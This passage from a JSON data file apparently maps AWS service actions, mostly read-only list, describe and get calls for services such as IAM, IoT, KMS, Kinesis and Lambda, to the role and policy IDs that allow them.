{"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listUsers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:listVirtualMFADevices": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:simulateCustomPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iam:simulatePrincipalPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"imagebuilder:getComponent": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"imagebuilder:getComponentPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"imagebuilder:getDistributionConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"imagebuilder:getImage": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"imagebuilder:getImagePipeline": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"imagebuilder:getImagePolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"imagebuilder:getImageRecipe": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"imagebuilder:getImageRecipePolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"imagebuilder:getInfrastructureConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"imagebuilder:listComponentBuildVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"imagebuilder:listComponents": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"imagebuilder:listDistributionConfigurations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"imagebuilder:listImageBuildVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"imagebuilder:listImagePipelineImages": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"imagebuilder:listImagePipelines": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"imagebuilder:listImageRecipes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"imagebuilder:listImages": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"imagebuilder:listInfrastructureConfigurations": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"imagebuilder:listTagsForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"importexport:getStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"importexport:listJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"inspector:describeAssessmentRuns": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"inspector:describeAssessmentTargets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"inspector:describeAssessmentTemplates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"inspector:describeCrossAccountAccessRole": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"inspector:describeResourceGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"inspector:describeRulesPackages": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"inspector:getTelemetryMetadata": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"inspector:listAssessmentRunAgents": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"inspector:listAssessmentRuns": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"inspector:listAssessmentTargets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"inspector:listAssessmentTemplates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"inspector:listEventSubscriptions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"inspector:listRulesPackages": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"inspector:listTagsForResource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:describeAuthorizer": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:describeCACertificate": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:describeCertificate": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:describeDefaultAuthorizer": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:describeEndpoint": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:describeIndex": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:describeJobExecution": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:describeThing": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:describeThingGroup": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:describeTunnel": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:getEffectivePolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:getIndexingConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:getLoggingOptions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:getPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:getPolicyVersion": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:getTopicRule": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:getV2LoggingOptions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listAttachedPolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listAuthorizers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listCACertificates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listCertificates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listCertificatesByCA": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listJobExecutionsForJob": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listJobExecutionsForThing": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listJobs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listOutgoingCertificates": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listPolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listPolicyPrincipals": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listPolicyVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listPrincipalPolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listPrincipalThings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listRoleAliases": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listTargetsForPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listThingGroups": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listThingGroupsForThing": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listThingPrincipals": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listThingRegistrationTasks": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listThingTypes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listThings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listTopicRules": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listTunnels": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iot:listV2LoggingLevels": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotevents:describeDetector": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotevents:describeDetectorModel": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotevents:describeInput": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotevents:describeLoggingOptions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotevents:listDetectorModelVersions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotevents:listDetectorModels": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotevents:listDetectors": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotevents:listInputs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotsitewise:describeAccessPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotsitewise:describeAsset": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotsitewise:describeAssetModel": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotsitewise:describeAssetProperty": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotsitewise:describeDashboard": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotsitewise:describeGateway": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotsitewise:describeGatewayCapabilityConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotsitewise:describeLoggingOptions": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotsitewise:describePortal": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotsitewise:describeProject": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotsitewise:listAccessPolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotsitewise:listAssetModels": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotsitewise:listAssociatedAssets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotsitewise:listDashboards": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotsitewise:listGateways": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotsitewise:listPortals": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotsitewise:listProjectAssets": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"iotsitewise:listProjects": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kafka:describeCluster": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kafka:getBootstrapBrokers": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kafka:listClusters": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kafka:listNodes": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kendra:describeDataSource": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kendra:describeFaq": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kendra:describeIndex": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kendra:getDataSourceSyncJobHistory": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kendra:listDataSources": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kendra:listFaqs": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kendra:listIndices": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kinesis:CreateStream": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"kinesis:DeleteStream": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"kinesis:DescribeLimits": {"roles": {"Allow": {"AROAJCHEQKY4NYQFQWP5K": {"Resource": {"*": {"policies": {"ANPAJH4QJ2WMHBOB47BUE": {"condition": null}}}}}}}},"kinesis:DescribeStream": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"kinesis:GetRecords": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"kinesis:GetShardIterator": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"kinesis:MergeShards": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"kinesis:PutRecord": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"kinesis:SplitShard": {"roles": {"Allow": {"AROAI265GPNVMDZAKJPPA": {"Resource": {"*": {"policies": {"ANPAIGALS5RCDLZLB3PGS": {"condition": null}}}}}}}},"kinesis:describeStream": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kinesis:listStreams": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kinesis:listTagsForStream": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kinesisanalytics:describeApplication": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kinesisanalytics:listApplications": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kms:describeKey": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kms:getKeyPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kms:getKeyRotationStatus": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kms:listAliases": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kms:listGrants": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kms:listKeyPolicies": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kms:listKeys": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kms:listResourceTags": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"kms:listRetirableGrants": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lambda:getAccountSettings": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lambda:getAlias": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lambda:getEventSourceMapping": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lambda:getFunction": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lambda:getFunctionConcurrency": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lambda:getFunctionConfiguration": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lambda:getFunctionEventInvokeConfig": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lambda:getLayerVersion": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lambda:getLayerVersionPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lambda:getPolicy": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lambda:getProvisionedConcurrencyConfig": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": {"*": {"policies": {"ANPAJ7W6266ELXF5MISDS": {"condition": null}}}}}}}},"lambda:listAliases": {"roles": {"Allow": {"AROAJCXETX2ROIWUKOPGG": {"Resource": 